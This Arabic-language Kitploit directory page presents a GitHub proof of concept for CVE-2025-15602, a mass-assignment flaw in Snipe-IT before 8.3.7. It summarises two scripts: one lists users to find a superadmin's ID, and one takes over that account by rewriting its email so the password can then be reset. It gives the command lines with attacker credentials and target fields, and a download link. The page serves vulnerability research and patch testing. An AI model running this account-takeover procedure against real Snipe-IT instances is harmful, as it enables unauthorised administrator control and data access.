Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-15602-PoC — Snipe-IT < 8.3.7 ثغرة تعيين جماعي تؤدي إلى تصعيد الامتيازات | Kitploit
أدوات/GitHubGitHub/nxvh1337/cve-2025-15602-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالمصادقة
GitHubnxvh1337/cve-2025-15602-poc

CVE-2025-15602-PoC

Snipe-IT < 8.3.7 ثغرة تعيين جماعي تؤدي إلى تصعيد الامتيازات

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-15602-PoC

CVE-2025-15602-PoC هو إثبات مفهوم للثغرة CVE-2025-15602 في Snipe-IT. نص برمجي لسرد جميع المستخدمين ونص برمجي للاستيلاء على حساب مشرف فائق.

السياق

مستخدم لديه فقط صلاحية تعديل المستخدمين، يمكنه إساءة استخدامها لسردهم والاستيلاء على حساب المشرف الفائق.

list_users.py

لا تنس تغيير BASE_URL في النص البرمجي ليتوافق مع نسختك من snipe-it.

يسرد جميع المستخدمين من النسخة، للحصول على معرف المشرف الفائق الذي تريد الاستيلاء عليه.

root@kitploit:~
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100

exploit_auth.py

لا تنس تغيير BASE_URL في النص البرمجي ليتوافق مع نسختك من snipe-it.

يستولي على حساب مشرف فائق عبر التخصيص الجماعي (mass assignment).

مهم: تحتاج إلى الحصول على المعلومات الصحيحة من list_users.py أولاً وإلا لن يعمل. يجب أن يكون id وusername وfirst_name مطابقين تمامًا للحساب الهدف.

root@kitploit:~
python3 exploit_auth.py \
  --target-id 1 \
  --admin-username admin \
  --admin-firstname Admin \
  --admin-email [email protected] \
  --attacker-username your_user \
  --attacker-password your_pass

بعد ذلك يمكنك إعادة تعيين كلمة المرور عبر البريد الإلكتروني الذي قمت بتعيينه.

المتطلبات

root@kitploit:~
pip install requests beautifulsoup4
تنزيل الأداة